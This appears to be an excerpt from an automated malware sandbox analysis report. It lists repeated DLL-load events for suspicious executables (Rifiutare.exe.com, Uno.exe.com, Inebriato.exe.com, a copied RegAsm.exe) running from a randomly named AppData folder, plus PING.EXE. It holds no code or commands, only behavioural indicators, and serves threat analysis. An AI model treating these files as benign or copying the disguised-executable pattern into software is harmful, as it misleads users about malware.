Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
